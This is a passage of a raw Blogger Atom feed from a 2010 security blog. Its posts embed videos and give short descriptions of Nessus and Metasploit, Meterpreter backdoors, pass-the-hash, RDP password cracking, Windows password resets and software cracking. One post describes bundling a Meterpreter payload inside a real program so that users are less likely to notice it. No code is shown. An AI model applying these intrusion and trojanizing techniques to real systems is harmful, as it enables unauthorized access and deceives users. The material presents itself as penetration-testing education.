src="http://www.youtube.com/v/o1HkgsNahOY&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-7590258558218155417?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/7590258558218155417/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/hacking-guestbook-redirect.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/7590258558218155417'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/7590258558218155417'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/hacking-guestbook-redirect.html' title='Hacking Guestbook (Redirect)'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-7059064435552997783</id><published>2010-04-04T13:55:00.001+08:00</published><updated>2010-04-06T09:55:23.358+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Metasploit'/><title type='text'>Owning with Nessus and Metasploit</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/8TqMDzBiM9Q&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/8TqMDzBiM9Q&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Nessus&lt;/b&gt; is a proprietary comprehensive vulnerability scanning program. It is free of charge for personal use in a non-enterprise environment. Its goal is to detect potential vulnerabilities on the tested systems. For example: &lt;br /&gt;&lt;ul&gt;&lt;li&gt;Vulnerabilities that allow a remote cracker to control or access sensitive data on a system.&lt;/li&gt;&lt;li&gt;Misconfiguration (e.g. open mail relay, missing patches, etc).&lt;/li&gt;&lt;li&gt;Default passwords, a few common passwords, and blank/absent passwords on some system accounts. Nessus can also call Hydra (an external tool) to launch a dictionary attack.&lt;/li&gt;&lt;li&gt;Denials of service against the TCP/IP stack by using mangled packets.&lt;/li&gt;&lt;/ul&gt;On UNIX (including Mac OS X), it consists of &lt;b&gt;nessusd&lt;/b&gt;, the Nessus daemon, which does the scanning, and &lt;i&gt;nessus&lt;/i&gt;, the client, which controls scans and presents the vulnerability results to the user. For Windows, &lt;b&gt;Nessus 3&lt;/b&gt; installs as an executable and has a self-contained scanning, reporting and management system.&lt;sup class="reference" id="cite_ref-0"&gt;&lt;/sup&gt;&lt;br /&gt;According to surveys done by sectools.org, Nessus is the world's most popular vulnerability scanner, taking first place in the 2000, 2003, and 2006 security tools survey.&lt;sup class="reference" id="cite_ref-sectools_1-0"&gt;&lt;/sup&gt; Tenable estimates that it is used by over 75,000 organizations worldwide.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-7059064435552997783?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/7059064435552997783/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/owning-with-nessus-and-metasploit.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/7059064435552997783'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/7059064435552997783'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/owning-with-nessus-and-metasploit.html' title='Owning with Nessus and Metasploit'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-2264315929094398491</id><published>2010-04-03T09:45:00.001+08:00</published><updated>2010-04-06T09:55:44.341+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Metasploit'/><title type='text'>Packing Metasploit's Meterpreter with Calculator using IExpress</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/6hB8GrTvyEU&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/6hB8GrTvyEU&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;This video demonstrates how a built in tool of XP and Vista (IExpress), can be used to pack a malicious payload with a real program to make it less likely for a user to think anything malicious is happening.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-2264315929094398491?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/2264315929094398491/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/packing-metasploits-meterpreter-with.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/2264315929094398491'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/2264315929094398491'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/packing-metasploits-meterpreter-with.html' title='Packing Metasploit&apos;s Meterpreter with Calculator using IExpress'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-3534228963156058770</id><published>2010-04-02T18:42:00.001+08:00</published><updated>2010-04-06T09:57:18.772+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Metasploit'/><title type='text'>Meterpreter as a Backdoor</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/BTfOzKACPsY&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/BTfOzKACPsY&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;A &lt;b&gt;backdoor&lt;/b&gt; in a computer system (or cryptosystem or algorithm) is a method of bypassing normal authentication, securing remote access to a computer, obtaining access to plaintext, and so on, while attempting to remain undetected. The backdoor may take the form of an installed program (e.g., Back Orifice), or could be a modification to an existing program or hardware device.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-3534228963156058770?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/3534228963156058770/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/meterpreter-as-backdoor.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/3534228963156058770'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/3534228963156058770'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/meterpreter-as-backdoor.html' title='Meterpreter as a Backdoor'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-2071525058525108588</id><published>2010-04-02T11:05:00.001+08:00</published><updated>2010-04-02T18:45:04.439+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Cracking'/><title type='text'>Pass the Hash with modified SMB Client Vulnerability</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/LTnKoUu9Axc&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/LTnKoUu9Axc&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;A modified SMB client can mount shares on an SMB host by passing the username and corresponding LanMan hash of an account that is authorized to access the host and share. The modified SMB client removes the need for the user to "decrypt" the password hash into its clear-text equivalent.&lt;br /&gt;&lt;br /&gt;&lt;paul@eigen.co.uk&gt;In order for this to be used in a malicious manner, the attacker must first obtain a valid username and LanMan hash for a user account known to have access permissions to the resource on the remote NT host. &lt;/paul@eigen.co.uk&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-2071525058525108588?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/2071525058525108588/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/pass-hash-with-modified-smb-client.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/2071525058525108588'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/2071525058525108588'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/pass-hash-with-modified-smb-client.html' title='Pass the Hash with modified SMB Client Vulnerability'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-3073302073931779960</id><published>2010-04-01T13:18:00.000+08:00</published><updated>2010-04-01T13:19:26.905+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Cracking'/><title type='text'>Cracking Tutorial</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/HaRJi6KtsYU&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/HaRJi6KtsYU&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Software cracking&lt;/b&gt; is the modification of software to remove protection methods: copy protection, trial/demo version, serial number, hardware key, date checks, CD check or software annoyances like nag screens and adware.&lt;br /&gt;The distribution and use of cracked copies is illegal in almost every developed country. There have been many lawsuits over cracking software, but most had to do with the distribution of the duplicated product rather than the process of defeating the protection, due to the difficulty of constructing legally sound proof of individual guilt in the latter instance. In the United States, the Digital Millennium Copyright Act (DMCA) made software cracking, as well as the distribution of information that facilitates software cracking, illegal. However, the law has hardly been tested in U.S. courts in cases of reverse engineering for personal use only. The European Union passed the EU Copyright Directive in May 2001, which makes software copyright infringement illegal as the member states pass legislation pursuant to the directive.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-3073302073931779960?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/3073302073931779960/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/cracking-tutorial.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/3073302073931779960'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/3073302073931779960'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/cracking-tutorial.html' title='Cracking Tutorial'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-6093433440597893991</id><published>2010-03-31T10:05:00.000+08:00</published><updated>2010-03-31T10:10:19.977+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Cloud Computing'/><title type='text'>Amazon EC2 Service In Depth (Cloud Computing)</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/H7-HhpXAowE&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/H7-HhpXAowE&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Cloud computing&lt;/b&gt; is Internet-based computing, whereby shared resources, software and information are provided to computers and other devices on-demand, like a public utility.&lt;br /&gt;It is a paradigm shift following the shift from mainframe to client-server that preceded it in the early '80s. Details are abstracted from the users who no longer have need of, expertise in, or control over the technology infrastructure "in the cloud" that supports them&lt;sup class="reference" id="cite_ref-0"&gt;&lt;span&gt;&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;/sup&gt;. Cloud computing describes a new supplement, consumption and delivery model for IT services based on the Internet, and it typically involves the provision of dynamically scalable and often virtualized resources as a service over the Internet.&lt;sup class="reference" id="cite_ref-gartner_1-0"&gt;&lt;span&gt;&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;/sup&gt;&lt;sup class="reference" id="cite_ref-really_2-0"&gt;&lt;span&gt;&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;/sup&gt; It is a byproduct and consequence of the ease-of-access to remote computing sites provided by the Internet.&lt;sup class="reference" id="cite_ref-3"&gt;&lt;span&gt;&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;/sup&gt;&lt;br /&gt;The term &lt;i&gt;cloud&lt;/i&gt; is used as a metaphor for the Internet, based on the cloud drawing used in the past to represent the telephone network&lt;sup class="reference" id="cite_ref-4"&gt;&lt;span&gt;&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;/sup&gt;, and later to depict the Internet in computer network diagrams as an abstraction of the underlying infrastructure it represents.&lt;sup class="reference" id="cite_ref-5"&gt;&lt;span&gt;&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;/sup&gt; Typical cloud computing providers deliver common business applications online which are accessed from another web service or software like a web browser, while the software and data are stored on servers.&lt;br /&gt;A technical definition is "a computing capability that provides an abstraction between the computing resource and its underlying technical architecture (e.g., servers, storage, networks), enabling convenient, on-demand network access to a shared pool of configurable computing resources that can be rapidly provisioned and released with minimal management effort or service provider interaction."&lt;sup class="reference" id="cite_ref-csrc.nist.gov_6-0"&gt;&lt;span&gt;&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;/sup&gt; This definition states that clouds have five essential characteristics: on-demand self-service, broad network access, resource pooling, rapid elasticity, and measured service.&lt;sup class="reference" id="cite_ref-csrc.nist.gov_6-1"&gt;&lt;span&gt;&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;/sup&gt;&lt;br /&gt;The majority of cloud computing infrastructure, as of 2009&lt;sup class="plainlinks noprint asof-tag update" style="display: none;"&gt;&lt;a class="external text" href="http://en.wikipedia.org/w/index.php?title=Cloud_computing&amp;amp;action=edit" rel="nofollow"&gt;[update]&lt;/a&gt;&lt;/sup&gt;, consists of reliable services delivered through data centers and built on servers. Clouds often appear as single points of access for all consumers' computing needs. Commercial offerings are generally expected to meet quality of service (QoS) requirements of customers and typically offer SLAs.&lt;sup class="reference" id="cite_ref-ccpaper_7-0"&gt;&lt;span&gt;&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;/sup&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-6093433440597893991?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/6093433440597893991/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/03/amazon-ec2-service-in-depth-cloud.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/6093433440597893991'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/6093433440597893991'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/03/amazon-ec2-service-in-depth-cloud.html' title='Amazon EC2 Service In Depth (Cloud Computing)'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-8079946690840071664</id><published>2010-03-30T20:13:00.003+08:00</published><updated>2010-04-06T09:58:16.908+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Backtrack'/><title type='text'>Reset Passwords on Windows XP and Vista using Backtrack 4</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/JIeJkjB3okE&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/JIeJkjB3okE&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;chntpw&lt;/b&gt; is a Linux utility for resetting passwords of Windows (NT or 2k) users. It works by modifying the encrypted password in the registry directly, bypassing the need to use the old password.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-8079946690840071664?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/8079946690840071664/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/03/reset-passwords-on-windows-xp-and-vista.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/8079946690840071664'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/8079946690840071664'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/03/reset-passwords-on-windows-xp-and-vista.html' title='Reset Passwords on Windows XP and Vista using Backtrack 4'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-5184094450164825505</id><published>2010-03-30T09:51:00.001+08:00</published><updated>2010-03-31T10:09:32.880+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Cracking'/><title type='text'>Terminal Server / RDP Cracking</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/NntpTQ_7c1g&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/NntpTQ_7c1g&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;The simple demonstration above using the featured tools demonstrates the dangers of using weak passwords (those that can be found in a dictionary file) in Windows Remote Terminal Services and Remote Desktop Protocol (RDP).&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-5184094450164825505?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/5184094450164825505/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/03/terminal-server-rdp-cracking.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/5184094450164825505'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/5184094450164825505'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/03/terminal-server-rdp-cracking.html' title='Terminal Server / RDP Cracking'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-794569105232520355</id><published>2010-03-29T19:50:00.002+08:00</published><updated>2010-04-06T09:58:57.631+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Bypassing Firewalls'/><title type='text'>Firewalls</title><content type='html'>&lt;div id="__ss_4039" style="width: 425px;"&gt;&lt;object height="355" width="425"&gt;&lt;param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=firewall-24416&amp;amp;stripped_title=firewall" /&gt;&lt;param name="allowFullScreen" value="true"/&gt;&lt;param name="allowScriptAccess" value="always"/&gt;&lt;embed src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=firewall-24416&amp;amp;stripped_title=firewall" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;div style="padding: 5px 0pt 12px;"&gt;&lt;br /&gt;A firewall is a part of a computer system or network that is designed to block unauthorized access while permitting authorized communications. It is a device or set of devices which is configured to permit or deny computer based application upon a set of rules and other criteria.&lt;/div&gt;&lt;/div&gt;Firewalls can be implemented in either hardware or software, or a combination of both. Firewalls are frequently used to prevent unauthorized Internet users from accessing private networks connected to the Internet, especially intranets. All messages entering or leaving the intranet pass through the firewall, which examines each message and blocks those that do not meet the specified security criteria.&lt;br /&gt;There are several types of firewall techniques:&lt;br /&gt;&lt;ol&gt;&lt;li&gt;Packet filter: Packet filtering inspects each packet passing through the network and accepts or rejects it based on user-defined rules. Although difficult to configure, it is fairly effective and mostly transparent to its users. It is susceptible to IP spoofing.&lt;/li&gt;&lt;li&gt;Application gateway: Applies security mechanisms to specific applications, such as FTP and Telnet servers. This is very effective, but can impose a performance degradation.&lt;/li&gt;&lt;li&gt;Circuit-level gateway: Applies security mechanisms when a TCP or UDP connection is established. Once the connection has been made, packets can flow between the hosts without further checking.&lt;/li&gt;&lt;li&gt;Proxy server: Intercepts all messages entering and leaving the network. The proxy server effectively hides the true network addresses.&lt;/li&gt;&lt;/ol&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-794569105232520355?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/794569105232520355/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/03/firewalls.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/794569105232520355'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/794569105232520355'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/03/firewalls.html' title='Firewalls'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-8724422851171519697</id><published>2010-03-27T21:02:00.003+08:00</published><updated>2010-04-07T20:11:22.134+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Web Hacking'/><title type='text'>Samurai Web Assessment Framework</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/IKo7rvute5I&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/IKo7rvute5I&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;The Samurai Web Testing Framework is a live linux environment that has been pre-configured to function                 as a web pen-testing environment.  The CD contains the best of the open source and free tools that focus on                 testing and attacking websites. The tools included are used in all four steps of a web pen-test.&lt;br /&gt;Starting with reconnaissance, tools such as the Fierce domain scanner and Maltego. For mapping, tools such as WebScarab and ratproxy. Tools for discovery include w3af and burp. For exploitation, the final stage, BeEF, AJAXShell and much more have also been included.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-8724422851171519697?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/8724422851171519697/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/03/samurai-web-exploitation-assessment.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/8724422851171519697'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/8724422851171519697'/><link rel='alternate' type='text/html' 